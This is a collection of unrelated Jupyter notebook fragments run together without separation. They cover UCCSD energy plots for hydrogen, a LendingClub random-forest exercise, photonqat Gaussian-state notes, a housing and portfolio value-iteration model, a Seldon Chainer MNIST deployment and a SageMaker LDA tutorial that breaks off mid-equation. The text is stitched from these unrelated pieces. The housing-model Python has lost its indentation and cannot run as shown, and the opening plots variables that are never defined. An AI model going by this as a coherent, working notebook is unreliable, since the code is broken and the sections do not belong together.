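The Trotterization error mentioned here can be illustrated on a toy single-qubit Hamiltonian $H = X + Z$ (chosen purely for illustration, not the H2 Hamiltonian used in this notebook): the first-order product formula $(e^{-iXt/n}e^{-iZt/n})^n$ approaches $e^{-iHt}$ as the number of Trotter steps $n$ grows.

```python
import numpy as np

# Single-qubit Pauli matrices
X = np.array([[0, 1], [1, 0]], dtype=complex)
Z = np.array([[1, 0], [0, -1]], dtype=complex)
I2 = np.eye(2, dtype=complex)

def exp_pauli(P, theta):
    # Exact exponential exp(-i*theta*P) for a Pauli matrix (P @ P = I)
    return np.cos(theta) * I2 - 1j * np.sin(theta) * P

t = 0.5
# Exact evolution under H = X + Z: (X+Z)/sqrt(2) squares to the identity
norm = np.sqrt(2)
exact = np.cos(norm * t) * I2 - 1j * np.sin(norm * t) * (X + Z) / norm

def trotter(n):
    # First-order Trotter step, repeated n times
    step = exp_pauli(X, t / n) @ exp_pauli(Z, t / n)
    return np.linalg.matrix_power(step, n)

errors = [np.linalg.norm(trotter(n) - exact) for n in (1, 4, 16)]
print(errors)  # error shrinks roughly as 1/n for the first-order formula
```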
We plot the results below:
```
%matplotlib notebook
import matplotlib.pyplot as plt
plt.figure()
plt.plot(spacing,E_hf,label='HF energy')
plt.plot(spacing,E_ccsd,label='CCSD energy')
plt.plot(spacing,E_uccsd,label='UCCSD energy (guess)')
plt.plot(spacing,E_uccsd_opt,label='UCCSD energy (optim)')
plt.plot(spacing,E_fci,label='FCI energy')
plt.xlabel('spacing (Angstrom)')
plt.ylabel('Energy (Hartree)')
plt.title('Dissociation curve hydrogen molecule')
plt.legend()
plt.figure()
plt.semilogy(spacing,np.abs(E_fci-E_hf),label='HF energy')
plt.semilogy(spacing,np.abs(E_fci-E_ccsd),label='CCSD energy')
plt.semilogy(spacing,np.abs(E_fci-E_uccsd),label='UCCSD energy (guess)')
plt.semilogy(spacing,np.abs(E_fci-E_uccsd_opt),label='UCCSD energy (optim)')
plt.semilogy(spacing,0.0016*np.ones([len(spacing),1]),label='chemical accuracy',linestyle='-.',color='black')
plt.xlabel('spacing (Angstrom)')
plt.ylabel('Energy error with FCI (Hartree)')
plt.title('Error with FCI - Dissociation curve hydrogen molecule')
plt.legend()
```
We find that the HF energy is not within chemical accuracy of the FCI energy, while CCSD and UCCSD can reach that level. Clearly, for larger bond distances the approximations are less accurate, but the UCCSD optimization still reaches the ground state to numerical precision. Note that the UCCSD method is not guaranteed to reach this level of accuracy for general molecules; one can experiment with that using this notebook before implementing the UCC in a quantum circuit, which will always perform worse.
# Random Forest Project
For this project we will be exploring publicly available data from [LendingClub.com](https://www.lendingclub.com). Lending Club connects people who need money (borrowers) with people who have money (investors). Hopefully, as an investor you would want to invest in people who show a profile of having a high probability of paying you back. We will try to create a model that will help predict this.
Lending Club had a [very interesting year in 2016](https://en.wikipedia.org/wiki/Lending_Club#2016), so let's check out some of their data and keep the context in mind. This data is from before they even went public.
We will use lending data from 2007-2010 and try to classify and predict whether or not the borrower paid back their loan in full.
Here are what the columns represent:
* credit.policy: 1 if the customer meets the credit underwriting criteria of LendingClub.com, and 0 otherwise.
* purpose: The purpose of the loan (takes values "credit_card", "debt_consolidation", "educational", "major_purchase", "small_business", and "all_other").
* int.rate: The interest rate of the loan, as a proportion (a rate of 11% would be stored as 0.11). Borrowers judged by LendingClub.com to be more risky are assigned higher interest rates.
* installment: The monthly installments owed by the borrower if the loan is funded.
* log.annual.inc: The natural log of the self-reported annual income of the borrower.
* dti: The debt-to-income ratio of the borrower (amount of debt divided by annual income).
* fico: The FICO credit score of the borrower.
* days.with.cr.line: The number of days the borrower has had a credit line.
* revol.bal: The borrower's revolving balance (amount unpaid at the end of the credit card billing cycle).
* revol.util: The borrower's revolving line utilization rate (the amount of the credit line used relative to total credit available).
* inq.last.6mths: The borrower's number of inquiries by creditors in the last 6 months.
* delinq.2yrs: The number of times the borrower had been 30+ days past due on a payment in the past 2 years.
* pub.rec: The borrower's number of derogatory public records (bankruptcy filings, tax liens, or judgments).
# Import Libraries
**Import the usual libraries for pandas and plotting.**
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
```
## Get the Data
** Use pandas to read loan_data.csv as a dataframe called loans.**
```
loans = pd.read_csv('loan_data.csv')
```
** Check out the info(), head(), and describe() methods on loans.**
```
loans.info()
loans.describe()
loans.head()
```
# Exploratory Data Analysis
** Create a histogram of two FICO distributions on top of each other, one for each credit.policy outcome.**
```
plt.figure(figsize=(10,6))
loans[loans['credit.policy']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='Credit.Policy=1')
loans[loans['credit.policy']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='Credit.Policy=0')
plt.legend()
plt.xlabel('FICO')
```
** Create a similar figure, except this time select by the not.fully.paid column.**
```
plt.figure(figsize=(10,6))
loans[loans['not.fully.paid']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='not.fully.paid=1')
loans[loans['not.fully.paid']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='not.fully.paid=0')
plt.legend()
plt.xlabel('FICO')
```
** Create a countplot using seaborn showing the counts of loans by purpose, with the color hue defined by not.fully.paid. **
```
sns.countplot(x='purpose',data=loans,hue='not.fully.paid')
```
** Let's see the trend between FICO score and interest rate.**
```
sns.jointplot(x='fico',y='int.rate',data=loans,color='purple')
```
** Create the following lmplots to see if the trend differed between not.fully.paid and credit.policy.**
```
sns.lmplot(x='fico',y='int.rate',data=loans,hue='credit.policy',col='not.fully.paid')
```
# Setting up the Data
Let's get ready to set up our data for our Random Forest Classification Model!
**Check loans.info() again.**
```
loans.info()
```
## Categorical Features
Notice that the **purpose** column is categorical.
**Create a list of 1 element containing the string 'purpose'. Call this list cat_feats.**
```
cat_feats = ['purpose']
```
**Now use pd.get_dummies(loans,columns=cat_feats,drop_first=True) to create a fixed larger dataframe that has new feature columns with dummy variables. Set this dataframe as final_data.**
```
final_data = pd.get_dummies(loans,columns=cat_feats,drop_first=True)
final_data.info()
```
## Train Test Split
Now it's time to split our data into a training set and a testing set!
```
from sklearn.model_selection import train_test_split
X = final_data.drop('not.fully.paid',axis=1)
y = final_data['not.fully.paid']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
```
## Training a Decision Tree Model
Let's start by training a single decision tree first!
** Import DecisionTreeClassifier**
```
from sklearn.tree import DecisionTreeClassifier
```
**Create an instance of DecisionTreeClassifier() called dtree and fit it to the training data.**
```
dtree = DecisionTreeClassifier()
dtree.fit(X_train,y_train)
```
## Predictions and Evaluation of Decision Tree
**Create predictions from the test set and create a classification report and a confusion matrix.**
```
pred = dtree.predict(X_test)
from sklearn.metrics import classification_report,confusion_matrix
print(classification_report(y_test,pred))
print(confusion_matrix(y_test,pred))
```
## Training the Random Forest model
**Create an instance of the RandomForestClassifier class and fit it to our training data from the previous step.**
```
from sklearn.ensemble import RandomForestClassifier
rfc = RandomForestClassifier(n_estimators=600)
rfc.fit(X_train,y_train)
```
## Predictions and Evaluation
```
pred = rfc.predict(X_test)
```
**Now create a classification report from the results.**
```
print(classification_report(y_test,pred))
```
**Show the Confusion Matrix for the predictions.**
```
print(confusion_matrix(y_test,pred))
```
**What performed better the random forest or the decision tree?**
```
# RandomForestClassifier showed better results, but they are still not good enough, so further feature engineering is needed
```
```
import photonqat as pq
import numpy as np
import matplotlib.pyplot as plt
```
## Photonqat
This notebook walks through the basic gate operations and a measurement.
```
G = pq.Gaussian(2) # two qumode [0, 1]
G.D(0, 2) # Displacement gate, x to x+2
G.S(0, 1) # X squeezing gate, r=1
G.R(0, np.pi/4) # pi/4 rotation gate
G.BS(0, 1, np.pi/4) # 50:50 beam splitter
x = G.MeasX(1) # Measure mode 1
G.Wigner(0) # plot
print('measured x =', x)
print('mu0 =', G.mean(0)) # mu of qumode 0
print('cov0 =', G.cov(0)) # covariance of qumode 0
```
## Notes
## Phase space
N bosonic mode Hilbert space
$\otimes^{N}_{k=1} \mathcal{H}_k$
vectorial operator
$\hat{\mathbf{b}} = (\hat{a}_1, \hat{a}_1^{\dagger}, \dots, \hat{a}_N, \hat{a}_N^{\dagger})$ : 2N elements
bosonic commutation relations
$[\hat{b}_i, \hat{b}_j] = \Omega_{ij}\ \ (i, j = 1, \dots, 2N)$
$\mathbf{\Omega} = \oplus_{k=1}^{N}\omega\ \ \
\omega =
\begin{pmatrix}
0 & 1 \\
-1 & 0 \\
\end{pmatrix}
$
Quadrature field
$\hat{\mathbf{x}} = (\hat{q}_1, \hat{p}_1, \dots, \hat{q}_N, \hat{p}_N)$ : 2N elements
canonical commutation relation
$[\hat{x}_i, \hat{x}_j] = 2i\Omega_{ij}\ \ (i, j = 1, \dots, 2N)$
## Density operators and Wigner functions
Consider an arbitrary density operator $\hat{\rho}$.
Every density operator has an equivalent Wigner function.
Weyl operator
$D(\xi) = \exp(i \hat{x}^T \Omega \xi)$
Using this, the Wigner characteristic function can be defined:
$\chi (\xi) = \mathrm{Tr}[\hat{\rho}D(\xi)]$
The Wigner function is the Fourier transform of the Wigner characteristic function:
$W(\mathbf{x}) = \int_{\mathbb{R}^{2N}} \frac{d^{2N}\xi}{(2\pi)^{2N}} \exp{(-i \mathbf{x}^T \Omega \xi)} \chi (\xi)$
## Moments and the Wigner function
The Wigner function can equivalently be characterized by its statistical moments:
- first moment
$\bar{\mathbf{x}} = \langle \hat{\mathbf{x}} \rangle= \mathrm{Tr}[\hat{\mathbf{x}} \hat{\rho}]$
- second moment
$V_{ij} = \frac{1}{2}\langle \{\Delta\hat{x}_i, \Delta\hat{x}_j \}\rangle$
$\{ A, B \} = AB+BA$
$V_{ii}$ is the variance of $\hat{x}_i$.
A Gaussian state is completely described by its first two moments.
## Gaussian unitaries
In terms of the quadrature operators, a Gaussian unitary acts as an affine map:
$(\mathbf{S}, \mathbf{d}) : \hat{\mathbf{x}}\to \mathbf{S}\hat{\mathbf{x}} + \mathbf{d}$
Williamson's Theorem
Any even-dimensional positive-definite real matrix can be diagonalized by a symplectic transform:
$\mathbf{V} = \mathbf{SV}^{\oplus}\mathbf{S}^{T}$
$\mathbf{V}^{\oplus} = \oplus^{N}_{k=1} \nu_k \mathbf{I}$
## Gaussian Measurement
POVM: $\Pi_i = E_{i}^{\dagger}E_i\ \ \ (\sum_i E_{i}^{\dagger}E_i = I)$
We replace this with its continuous-variable analogue.
A Gaussian measurement is a measurement performed on a Gaussian state whose outcomes follow a Gaussian distribution, and which leaves the unmeasured modes in a Gaussian state.
Let $\mathbf{B}$ denote the measured subsystem and $\mathbf{A}$ the remaining subsystem.
Probability distribution of the measurement outcomes: the Gaussian Wigner distribution with the quadratures of all unmeasured modes marginalized out.
Post-measurement state:
$\mathbf{V} = \mathbf{A} - \mathbf{C}(\mathbf{\Pi B \Pi})^{-1}\mathbf{C}^T$
$\mathbf{\Pi} = \rm{diag}(1, 0)$ (for an $\hat{x}$ measurement)
$\mathbf{\Pi B \Pi}$ is singular, so the pseudo-inverse is used:
$(\mathbf{\Pi B \Pi})^{-1} = B_{11}^{-1}\Pi$
This is essentially the same as taking the conditional distribution of a multivariate Gaussian,
so the post-measurement mean is obtained in the same way:
$\mathbf{\mu} = \mathbf{\mu_A} - \mathbf{C}(\mathbf{\Pi B \Pi})^{-1}(\mathbf{\mu_B} - x_B\mathbf{\Pi})$
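The covariance update above can be checked numerically with the Moore-Penrose pseudo-inverse; the block matrices below are made-up illustrative values, not taken from any particular state.

```python
import numpy as np

# Joint covariance of subsystems A (kept) and B (measured), in block form
A = np.array([[2.0, 0.0], [0.0, 2.0]])
B = np.array([[2.0, 0.0], [0.0, 2.0]])
C = np.array([[1.0, 0.0], [0.0, 0.0]])

Pi = np.diag([1.0, 0.0])  # homodyne x-measurement projector
# Pi @ B @ Pi is singular, so use the Moore-Penrose pseudo-inverse
V_post = A - C @ np.linalg.pinv(Pi @ B @ Pi) @ C.T
print(V_post)
```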
### Simple housing version
* State: $[w, n, M, e, \hat{S}, z]$, where $z$ is the stock-trading experience, which takes values 0 and 1, and $\hat{S}$ now contains 27 states.
* Action: $[c, b, k, q]$, where $q$ only takes 2 values: $1$ or $\frac{1}{2}$
```
from scipy.interpolate import interpn
from multiprocessing import Pool
from functools import partial
from constant import *
import warnings
warnings.filterwarnings("ignore")
#Define the utility function
def u(c):
return (np.float_power(c, 1-gamma) - 1)/(1 - gamma)
#Define the bequeath function, which is a function of wealth
def uB(tb):
return B*u(tb)
#Calculate HE
def calHE(x):
# the input x is a numpy array
# w, n, M, e, s, z = x
HE = H*pt - x[:,2]
return HE
#Calculate TB
def calTB(x):
# the input x as a numpy array
# w, n, M, e, s, z = x
TB = x[:,0] + x[:,1] + calHE(x)
return TB
#The reward function
def R(x, a):
'''
Input:
state x: w, n, M, e, s, z
action a: c, b, k, q = a which is a np array
Output:
reward value: the length of return should be equal to the length of a
'''
w, n, M, e, s, z = x
reward = np.zeros(a.shape[0])
# actions with not renting out
nrent_index = (a[:,3]==1)
# actions with renting out
rent_index = (a[:,3]!=1)
# housing consumption not renting out
nrent_Vh = (1+kappa)*H
# housing consumption renting out
rent_Vh = (1-kappa)*(H/2)
# combined consumption with housing consumption
nrent_C = np.float_power(a[nrent_index][:,0], alpha) * np.float_power(nrent_Vh, 1-alpha)
rent_C = np.float_power(a[rent_index][:,0], alpha) * np.float_power(rent_Vh, 1-alpha)
reward[nrent_index] = u(nrent_C)
reward[rent_index] = u(rent_C)
return reward
def transition(x, a, t):
'''
Input: state and action and time, where action is an array
Output: possible future states and corresponding probability
'''
w, n, M, e, s, z = x
s = int(s)
e = int(e)
nX = len(x)
aSize = len(a)
# mortgage payment
m = M/D[T_max-t]
M_next = M*(1+rh) - m
# actions
b = a[:,1]
k = a[:,2]
q = a[:,3]
# transition of z
z_next = np.ones(aSize)
if z == 0:
z_next[k==0] = 0
# we want the output format to be array of all possible future states and corresponding
# probability. x = [w_next, n_next, M_next, e_next, s_next, z_next]
# create the empty numpy array to collect future states and probability
if t >= T_R:
future_states = np.zeros((aSize*nS,nX))
n_next = gn(t, n, x, (r_k+r_b)/2)
future_states[:,0] = np.repeat(b*(1+r_b[s]), nS) + np.repeat(k, nS)*(1+np.tile(r_k, aSize))
future_states[:,1] = np.tile(n_next,aSize)
future_states[:,2] = M_next
future_states[:,3] = 0
future_states[:,4] = np.tile(range(nS),aSize)
future_states[:,5] = np.repeat(z_next,nS)
future_probs = np.tile(Ps[s],aSize)
else:
future_states = np.zeros((2*aSize*nS,nX))
n_next = gn(t, n, x, (r_k+r_b)/2)
future_states[:,0] = np.repeat(b*(1+r_b[s]), 2*nS) + np.repeat(k, 2*nS)*(1+np.tile(r_k, 2*aSize))
future_states[:,1] = np.tile(n_next,2*aSize)
future_states[:,2] = M_next
future_states[:,3] = np.tile(np.repeat([0,1],nS), aSize)
future_states[:,4] = np.tile(range(nS),2*aSize)
future_states[:,5] = np.repeat(z_next,2*nS)
# employed right now:
if e == 1:
future_probs = np.tile(np.append(Ps[s]*Pe[s,e], Ps[s]*(1-Pe[s,e])),aSize)
else:
future_probs = np.tile(np.append(Ps[s]*(1-Pe[s,e]), Ps[s]*Pe[s,e]),aSize)
return future_states, future_probs
# Use to approximate the discrete values in V
class Approxy(object):
def __init__(self, points, Vgrid):
self.V = Vgrid
self.p = points
def predict(self, xx):
pvalues = np.zeros(xx.shape[0])
for e in [0,1]:
for s in range(nS):
for z in [0,1]:
index = (xx[:,3] == e) & (xx[:,4] == s) & (xx[:,5] == z)
pvalues[index]=interpn(self.p, self.V[:,:,:,e,s,z], xx[index][:,:3],
bounds_error = False, fill_value = None)
return pvalues
# used to calculate dot product
def dotProduct(p_next, uBTB, t):
if t >= T_R:
return (p_next*uBTB).reshape((len(p_next)//(nS),(nS))).sum(axis = 1)
else:
return (p_next*uBTB).reshape((len(p_next)//(2*nS),(2*nS))).sum(axis = 1)
# Value function is a function of state and time t < T
def V(x, t, NN):
w, n, M, e, s, z = x
yat = yAT(t,x)
m = M/D[T_max - t]
    # If the agent cannot pay the mortgage
if yat + w < m:
return [0, [0,0,0,0,0]]
# The agent can pay for the mortgage
if t == T_max-1:
# The objective functions of terminal state
def obj(actions):
# Not renting out case
# a = [c, b, k, q]
x_next, p_next = transition(x, actions, t)
uBTB = uB(calTB(x_next)) # conditional on being dead in the future
return R(x, actions) + beta * dotProduct(uBTB, p_next, t)
else:
def obj(actions):
# Renting out case
# a = [c, b, k, q]
x_next, p_next = transition(x, actions, t)
V_tilda = NN.predict(x_next) # V_{t+1} conditional on being alive, approximation here
uBTB = uB(calTB(x_next)) # conditional on being dead in the future
return R(x, actions) + beta * (Pa[t] * dotProduct(V_tilda, p_next, t) + (1 - Pa[t]) * dotProduct(uBTB, p_next, t))
def obj_solver(obj):
# Constrain: yat + w - m = c + b + kk
actions = []
budget1 = yat + w - m
for cp in np.linspace(0.001,0.999,11):
c = budget1 * cp
budget2 = budget1 * (1-cp)
#.....................stock participation cost...............
for kp in np.linspace(0,1,11):
                # If z == 1 pay maintenance cost Km = 0.5
if z == 1:
# kk is stock allocation
kk = budget2 * kp
if kk > Km:
k = kk - Km
b = budget2 * (1-kp)
else:
k = 0
b = budget2
                # If z == 0 and k > 0 pay participation fee Kc = 5
else:
kk = budget2 * kp
if kk > Kc:
k = kk - Kc
b = budget2 * (1-kp)
else:
k = 0
b = budget2
#..............................................................
# q = 1 not renting in this case
actions.append([c,b,k,1])
# Constrain: yat + w - m + (1-q)*H*pr = c + b + kk
for q in [1,0.5]:
budget1 = yat + w - m + (1-q)*H*pr
for cp in np.linspace(0.001,0.999,11):
c = budget1*cp
budget2 = budget1 * (1-cp)
#.....................stock participation cost...............
for kp in np.linspace(0,1,11):
                    # If z == 1 pay maintenance cost Km = 0.5
if z == 1:
# kk is stock allocation
kk = budget2 * kp
if kk > Km:
k = kk - Km
b = budget2 * (1-kp)
else:
k = 0
b = budget2
                    # If z == 0 and k > 0 pay participation fee Kc = 5
else:
kk = budget2 * kp
if kk > Kc:
k = kk - Kc
b = budget2 * (1-kp)
else:
k = 0
b = budget2
#..............................................................
# i = 0, no housing improvement when renting out
actions.append([c,b,k,q])
actions = np.array(actions)
values = obj(actions)
fun = np.max(values)
ma = actions[np.argmax(values)]
return fun, ma
fun, action = obj_solver(obj)
return np.array([fun, action])
# wealth discretization
ws = np.array([10,25,50,75,100,125,150,175,200,250,500,750,1000,1500,3000])
w_grid_size = len(ws)
# 401k amount discretization
ns = np.array([1, 5, 10, 15, 25, 50, 100, 150, 400, 1000])
n_grid_size = len(ns)
# Mortgage amount
Ms = np.array([0.01*H,0.05*H,0.1*H,0.2*H,0.3*H,0.4*H,0.5*H,0.8*H]) * pt
M_grid_size = len(Ms)
points = (ws,ns,Ms)
# dimensions of the state
dim = (w_grid_size, n_grid_size,M_grid_size,2,nS,2)
dimSize = len(dim)
xgrid = np.array([[w, n, M, e, s, z]
for w in ws
for n in ns
for M in Ms
for e in [0,1]
for s in range(nS)
for z in [0,1]
]).reshape(dim + (dimSize,))
# reshape the state grid into a single line of states to facilitate multiprocessing
xs = xgrid.reshape((np.prod(dim),dimSize))
Vgrid = np.zeros(dim + (T_max,))
cgrid = np.zeros(dim + (T_max,))
bgrid = np.zeros(dim + (T_max,))
kgrid = np.zeros(dim + (T_max,))
qgrid = np.zeros(dim + (T_max,))
print("The size of the housing: ", H)
print("The size of the grid: ", dim + (T_max,))
%%time
# value iteration: distribute states across a pool of worker processes
pool = Pool()
for t in range(T_max-1,T_max-3, -1):
print(t)
if t == T_max - 1:
f = partial(V, t = t, NN = None)
results = np.array(pool.map(f, xs))
else:
approx = Approxy(points,Vgrid[:,:,:,:,:,:,t+1])
f = partial(V, t = t, NN = approx)
results = np.array(pool.map(f, xs))
Vgrid[:,:,:,:,:,:,t] = results[:,0].reshape(dim)
cgrid[:,:,:,:,:,:,t] = np.array([r[0] for r in results[:,1]]).reshape(dim)
bgrid[:,:,:,:,:,:,t] = np.array([r[1] for r in results[:,1]]).reshape(dim)
kgrid[:,:,:,:,:,:,t] = np.array([r[2] for r in results[:,1]]).reshape(dim)
qgrid[:,:,:,:,:,:,t] = np.array([r[3] for r in results[:,1]]).reshape(dim)
pool.close()
```
|
github_jupyter
|
# Chainer MNIST Model Deployment
* Wrap a Chainer MNIST python model for use as a prediction microservice in seldon-core
* Run locally on Docker to test
* Deploy on seldon-core running on minikube
## Dependencies
* [Helm](https://github.com/kubernetes/helm)
* [Minikube](https://github.com/kubernetes/minikube)
* [S2I](https://github.com/openshift/source-to-image)
```bash
pip install seldon-core
pip install chainer==6.2.0
```
## Train locally
```
#!/usr/bin/env python
import argparse
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import training
from chainer.training import extensions
import chainerx
# Network definition
class MLP(chainer.Chain):
def __init__(self, n_units, n_out):
super(MLP, self).__init__()
with self.init_scope():
# the size of the inputs to each layer will be inferred
self.l1 = L.Linear(None, n_units) # n_in -> n_units
self.l2 = L.Linear(None, n_units) # n_units -> n_units
self.l3 = L.Linear(None, n_out) # n_units -> n_out
def forward(self, x):
h1 = F.relu(self.l1(x))
h2 = F.relu(self.l2(h1))
return self.l3(h2)
def main():
parser = argparse.ArgumentParser(description='Chainer example: MNIST')
parser.add_argument('--batchsize', '-b', type=int, default=100,
help='Number of images in each mini-batch')
parser.add_argument('--epoch', '-e', type=int, default=20,
help='Number of sweeps over the dataset to train')
parser.add_argument('--frequency', '-f', type=int, default=-1,
help='Frequency of taking a snapshot')
parser.add_argument('--device', '-d', type=str, default='-1',
help='Device specifier. Either ChainerX device '
'specifier or an integer. If non-negative integer, '
'CuPy arrays with specified device id are used. If '
'negative integer, NumPy arrays are used')
parser.add_argument('--out', '-o', default='result',
help='Directory to output the result')
parser.add_argument('--resume', '-r', type=str,
help='Resume the training from snapshot')
parser.add_argument('--unit', '-u', type=int, default=1000,
help='Number of units')
parser.add_argument('--noplot', dest='plot', action='store_false',
help='Disable PlotReport extension')
group = parser.add_argument_group('deprecated arguments')
group.add_argument('--gpu', '-g', dest='device',
type=int, nargs='?', const=0,
help='GPU ID (negative value indicates CPU)')
args = parser.parse_args(args=[])
device = chainer.get_device(args.device)
print('Device: {}'.format(device))
print('# unit: {}'.format(args.unit))
print('# Minibatch-size: {}'.format(args.batchsize))
print('# epoch: {}'.format(args.epoch))
print('')
# Set up a neural network to train
# Classifier reports softmax cross entropy loss and accuracy at every
# iteration, which will be used by the PrintReport extension below.
model = L.Classifier(MLP(args.unit, 10))
model.to_device(device)
device.use()
# Setup an optimizer
optimizer = chainer.optimizers.Adam()
optimizer.setup(model)
# Load the MNIST dataset
train, test = chainer.datasets.get_mnist()
train_iter = chainer.iterators.SerialIterator(train, args.batchsize)
test_iter = chainer.iterators.SerialIterator(test, args.batchsize,
repeat=False, shuffle=False)
# Set up a trainer
updater = training.updaters.StandardUpdater(
train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)
# Evaluate the model with the test dataset for each epoch
trainer.extend(extensions.Evaluator(test_iter, model, device=device))
# Dump a computational graph from 'loss' variable at the first iteration
# The "main" refers to the target link of the "main" optimizer.
# TODO(niboshi): Temporarily disabled for chainerx. Fix it.
if device.xp is not chainerx:
trainer.extend(extensions.DumpGraph('main/loss'))
# Take a snapshot for each specified epoch
frequency = args.epoch if args.frequency == -1 else max(1, args.frequency)
trainer.extend(extensions.snapshot(), trigger=(frequency, 'epoch'))
# Write a log of evaluation statistics for each epoch
trainer.extend(extensions.LogReport())
# Save two plot images to the result dir
if args.plot and extensions.PlotReport.available():
trainer.extend(
extensions.PlotReport(['main/loss', 'validation/main/loss'],
'epoch', file_name='loss.png'))
trainer.extend(
extensions.PlotReport(
['main/accuracy', 'validation/main/accuracy'],
'epoch', file_name='accuracy.png'))
# Print selected entries of the log to stdout
# Here "main" refers to the target link of the "main" optimizer again, and
# "validation" refers to the default name of the Evaluator extension.
# Entries other than 'epoch' are reported by the Classifier link, called by
# either the updater or the evaluator.
trainer.extend(extensions.PrintReport(
['epoch', 'main/loss', 'validation/main/loss',
'main/accuracy', 'validation/main/accuracy', 'elapsed_time']))
# Print a progress bar to stdout
trainer.extend(extensions.ProgressBar())
if args.resume is not None:
# Resume from a snapshot
chainer.serializers.load_npz(args.resume, trainer)
# Run the training
trainer.run()
if __name__ == '__main__':
main()
```
Wrap the model using s2i
```
!s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1
!docker run --name "mnist_predictor" -d --rm -p 5000:5000 chainer-mnist:0.1
```
Send some random features that conform to the contract
```
!seldon-core-tester contract.json 0.0.0.0 5000 -p
!docker rm mnist_predictor --force
```
# Test using Minikube
**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**
```
!minikube start --memory 4096
```
## Setup Seldon Core
Use the setup notebook to [Setup Cluster](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Setup-Cluster) with [Ambassador Ingress](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Ambassador) and [Install Seldon Core](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Install-Seldon-Core). Instructions [also online](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html).
```
!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1
!kubectl create -f chainer_mnist_deployment.json
!kubectl rollout status deploy/chainer-mnist-deployment-chainer-mnist-predictor-76478b2
!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \
seldon-deployment-example --namespace default -p
!minikube delete
```
# An Introduction to SageMaker LDA
***Finding topics in synthetic document data using Spectral LDA algorithms.***
---
1. [Introduction](#Introduction)
1. [Setup](#Setup)
1. [Training](#Training)
1. [Inference](#Inference)
1. [Epilogue](#Epilogue)
# Introduction
***
Amazon SageMaker LDA is an unsupervised learning algorithm that attempts to describe a set of observations as a mixture of distinct categories. Latent Dirichlet Allocation (LDA) is most commonly used to discover a user-specified number of topics shared by documents within a text corpus. Here each observation is a document, the features are the presence (or occurrence count) of each word, and the categories are the topics. Since the method is unsupervised, the topics are not specified up front, and are not guaranteed to align with how a human may naturally categorize documents. The topics are learned as a probability distribution over the words that occur in each document. Each document, in turn, is described as a mixture of topics.
In this notebook we will use the Amazon SageMaker LDA algorithm to train an LDA model on some example synthetic data. We will then use this model to classify (perform inference on) the data. The main goals of this notebook are to,
* learn how to obtain and store data for use in Amazon SageMaker,
* create an AWS SageMaker training job on a data set to produce an LDA model,
* use the LDA model to perform inference with an Amazon SageMaker endpoint.
The following are ***not*** goals of this notebook:
* understand the LDA model,
* understand how the Amazon SageMaker LDA algorithm works,
* interpret the meaning of the inference output
If you would like to know more about these things take a minute to run this notebook and then check out the SageMaker LDA Documentation and the **LDA-Science.ipynb** notebook.
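Although understanding the model is out of scope here, the generative story behind LDA can be made concrete in a few lines of numpy. This is only an illustrative sketch — the topic count, vocabulary size, document length, and Dirichlet parameters below are arbitrary choices for intuition, not values used by SageMaker:

```python
import numpy as np

rng = np.random.default_rng(0)
num_topics, vocab_size, doc_len = 5, 25, 100

# each topic is a probability distribution over the vocabulary
beta = rng.dirichlet(np.ones(vocab_size), size=num_topics)

# each document has a topic mixture drawn from a Dirichlet prior
theta = rng.dirichlet(np.ones(num_topics))

# sample a bag-of-words document: pick a topic per word, then a word from that topic
word_counts = np.zeros(vocab_size, dtype=int)
for _ in range(doc_len):
    topic = rng.choice(num_topics, p=theta)
    word = rng.choice(vocab_size, p=beta[topic])
    word_counts[word] += 1

print(word_counts.sum())  # 100: the total word count equals the document length
```

The observed data are only the `word_counts` vectors; training LDA means recovering (approximations of) `beta` and the per-document `theta` from them.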
```
%matplotlib inline
import os, re
import boto3
import matplotlib.pyplot as plt
import numpy as np
np.set_printoptions(precision=3, suppress=True)
# some helpful utility functions are defined in the Python module
# "generate_example_data" located in the same directory as this
# notebook
from generate_example_data import generate_griffiths_data, plot_lda, match_estimated_topics
# accessing the SageMaker Python SDK
import sagemaker
from sagemaker.amazon.common import RecordSerializer
from sagemaker.serializers import CSVSerializer
from sagemaker.deserializers import JSONDeserializer
```
# Setup
***
*This notebook was created and tested on an ml.m4.xlarge notebook instance.*
Before we do anything at all, we need data! We also need to setup our AWS credentials so that AWS SageMaker can store and access data. In this section we will do four things:
1. [Setup AWS Credentials](#SetupAWSCredentials)
1. [Obtain Example Data](#ObtainExampleData)
1. [Inspect Example Data](#InspectExampleData)
1. [Store Data on S3](#StoreDataonS3)
## Setup AWS Credentials
We first need to specify some AWS credentials; specifically data locations and access roles. This is the only cell of this notebook that you will need to edit. In particular, we need the following data:
* `bucket` - An S3 bucket accessible by this account.
* Used to store input training data and model data output.
* Should be within the same region as this notebook instance, training, and hosting.
* `prefix` - The location in the bucket where this notebook's input and output data will be stored. (The default value is sufficient.)
* `role` - The IAM Role ARN used to give training and hosting access to your data.
* See documentation on how to create these.
* The script below will try to determine an appropriate Role ARN.
```
from sagemaker import get_execution_role
session = sagemaker.Session()
role = get_execution_role()
bucket = session.default_bucket()
prefix = "sagemaker/DEMO-lda-introduction"
print("Training input/output will be stored in {}/{}".format(bucket, prefix))
print("\nIAM Role: {}".format(role))
```
## Obtain Example Data
We generate some example synthetic document data. For the purposes of this notebook we will omit the details of this process. All we need to know is that each piece of data, commonly called a *"document"*, is a vector of integers representing *"word counts"* within the document. In this particular example there are a total of 25 words in the *"vocabulary"*.
$$
\underbrace{w}_{\text{document}} = \overbrace{\big[ w_1, w_2, \ldots, w_V \big] }^{\text{word counts}},
\quad
